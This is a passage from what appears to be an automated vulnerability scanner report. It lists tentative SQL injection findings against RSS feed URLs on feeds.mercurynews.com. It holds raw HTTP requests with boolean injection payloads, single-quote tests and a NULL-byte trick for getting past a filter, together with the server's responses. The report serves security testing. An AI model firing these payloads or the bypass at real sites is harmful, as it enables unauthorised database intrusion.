Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56835561059%20or%201%3d2--%20/200759.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:08 GMT
Content-Length: 0
Connection: close


1.42. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200760.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200760.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 33757705'%20or%201%3d1--%20 and 33757705'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d1--%20/568/200760.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:07 GMT
Content-Length: 0
Connection: close

Request 2

GET /mngi/rss/CustomRssServlet33757705'%20or%201%3d2--%20/568/200760.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:07 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.43. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200764.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 93704237'%20or%201%3d1--%20 and 93704237'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi93704237'%20or%201%3d1--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:47 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi93704237'%20or%201%3d2--%20/rss/CustomRssServlet/568/200764.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:19:48 GMT
Date: Tue, 07 Dec 2010 23:19:48 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>


1.44. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200764.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200764.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200764.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:20:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:10 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200764.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:20:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:20:12 GMT
Content-Length: 11500
Connection: close
Set-Cookie: JSESSIONID=MIELIUOSWI45ICUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.45. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet%00'/568/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Date: Tue, 07 Dec 2010 23:19:31 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet%00''/568/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:31 GMT
Content-Length: 0
Connection: close


1.46. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 20373858'%20or%201%3d1--%20 and 20373858'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d1--%20/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:19:35 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56820373858'%20or%201%3d2--%20/200765.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:19:35 GMT
Content-Length: 0
Connection: close


1.47. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200765.xml [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200765.xml

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /mngi/rss/CustomRssServlet/568/200765.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:19:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:38 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/200765.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:19:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:19:38 GMT
Content-Length: 5986
Connection: close
Set-Cookie: JSESSIONID=HHM2QH2YXU3WICUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

1.48. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200769.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200769.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 12899183'%20or%201%3d1--%20 and 12899183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d1--%20/200769.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:16 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/56812899183'%20or%201%3d2--%20/200769.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:17 GMT
Content-Length: 0
Connection: close


1.49. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200772.xml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 84226288'%20or%201%3d1--%20 and 84226288'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi84226288'%20or%201%3d1--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Tue, 07 Dec 2010 23:20:13 GMT
Date: Tue, 07 Dec 2010 23:20:13 GMT
Content-Length: 424
Connection: close

<HTML>
<!-- This file is for Error code #404 - Not Found -->
<HEAD>
<TITLE>Not Found (404)</TITLE>
</HEAD>

<BODY BGCOLOR="#eeeeff">
<H1>Not Found (404)</H1>

The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error.
</BODY></HTML>

Request 2

GET /mngi84226288'%20or%201%3d2--%20/rss/CustomRssServlet/568/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

1.50. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200772.xml [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200772.xml

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d1--%20/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:30 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/200772.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/html
Date: Tue, 07 Dec 2010 23:20:31 GMT
Content-Length: 0
Connection: close


1.51. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/200774.xml [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://feeds.mercurynews.com
Path:   /mngi/rss/CustomRssServlet/568/200774.xml

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20519805'%20or%201%3d1--%20 and 20519805'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /mngi/rss/CustomRssServlet20519805'%20or%201%3d1--%20/568/200774.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 07 Dec 2010 23:20:00 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
